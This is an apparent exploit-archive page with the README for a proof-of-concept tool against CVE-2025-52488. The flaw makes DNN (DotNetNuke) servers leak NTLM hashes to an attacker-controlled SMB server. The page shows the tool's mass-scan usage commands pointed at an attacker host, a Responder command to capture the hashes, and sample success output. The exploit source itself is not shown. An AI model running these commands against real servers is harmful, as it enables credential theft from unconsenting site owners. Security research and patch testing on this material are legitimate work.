Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1359 CNY

100%

CVE-2025-52488 PoC — DNN.PLATFORM leaks NTLM hash via SMB Share Interaction with malicious user input

Source
Associated Vulnerability
Title: DNN.PLATFORM leaks NTLM hash via SMB Share Interaction with malicious user input (CVE-2025-52488)
Description:DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. In versions 6.0.0 to before 10.0.1, DNN.PLATFORM allows a specially crafted series of malicious interaction to potentially expose NTLM hashes to a third party SMB server. This issue has been patched in version 10.0.1.
Description
This exploit targets a vulnerability in DNN (formerly DotNetNuke) versions 6.0.0 to before 10.0.1 that allows attackers to disclose NTLM hashes through Unicode path normalization attacks.
Readme
# DNN Unicode Path Normalization NTLM Hash Disclosure Exploit (CVE-2025-52488)

## Overview
This exploit targets a vulnerability in DNN (formerly DotNetNuke) versions 6.0.0 to before 10.0.1 that allows attackers to disclose NTLM hashes through Unicode path normalization attacks.

## Vulnerability Details
- **CVE ID**: CVE-2025-52488
- **Severity**: High (CVSS 8.6)
- **Affected Versions**: 6.0.0 to before 10.0.1
- **Attack Vector**: Network
- **Authentication**: Not required

## How it Works
The exploit abuses Windows/.NET quirks and Unicode normalization to force the target DNN server to make SMB requests to an attacker-controlled server, potentially exposing NTLM hashes during the authentication process.

## Prerequisites
1. Python 3.7+
2. Required packages (install with `pip install -r requirements.txt`)
3. SMB server to capture NTLM hashes (e.g., Responder, Burp Collaborator)

## Usage

### Basic Usage
```bash
python main.py targets.txt attacker.example.com
```

### With Custom Parameters
```bash
python main.py targets.txt 192.168.1.100 -t 20 --timeout 15
```

### Arguments
- `targets`: File containing list of DNN hosts (one per line)
- `smb_server`: SMB server hostname/IP to capture NTLM hashes
- `-t, --threads`: Number of concurrent threads (default: 10)
- `--timeout`: Request timeout in seconds (default: 10)

## Target File Format
Create a text file with target URLs, one per line:
```
http://target1.example.com
https://target2.example.com:8080
target3.example.com
```

## Setting Up SMB Server
You can use tools like Responder to capture NTLM hashes:
```bash
responder -I eth0 -wrf
```

Or use Burp Collaborator for out-of-band detection.

## Example Output
```
[2025-01-XX-XX:XX:XX] [INFO] Starting DNN NTLM hash disclosure exploit against 5 targets
[2025-01-XX-XX:XX:XX] [INFO] SMB Server: attacker.example.com
[2025-01-XX-XX:XX:XX] [SUCCESS] [target1.com] DNN indicator found: dnn_IsMobile
[2025-01-XX-XX:XX:XX] [SUCCESS] [target1.com] File upload endpoint accessible
[2025-01-XX-XX:XX:XX] [SUCCESS] [target1.com] Exploit payload sent successfully
[2025-01-XX-XX:XX:XX] [INFO] [target1.com] Check your SMB server for incoming NTLM authentication attempts
```

## Detection Indicators
The exploit looks for the following DNN indicators:
- `dnn_IsMobile` cookie
- `dotnetnuke` in response
- `dnnconnect` in response
- `DNN Platform` in response

## Mitigation
- Update DNN to version 10.0.1 or later
- Implement network-level controls to prevent SMB requests to external servers
- Monitor for suspicious file upload attempts

## Disclaimer
This tool is for educational and authorized security testing purposes only. Use responsibly and only on systems you own or have explicit permission to test.

## References
- [CVE-2025-52488](https://github.com/dnnsoftware/Dnn.Platform/security/advisories/GHSA-mgfv-2362-jq96)
- [Assetnote Research](https://slcyber.io/assetnote-security-research-center/abusing-windows-net-quirks-and-unicode-normalization-to-exploit-dnn-dotnetnuke/#hunting-variants)
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →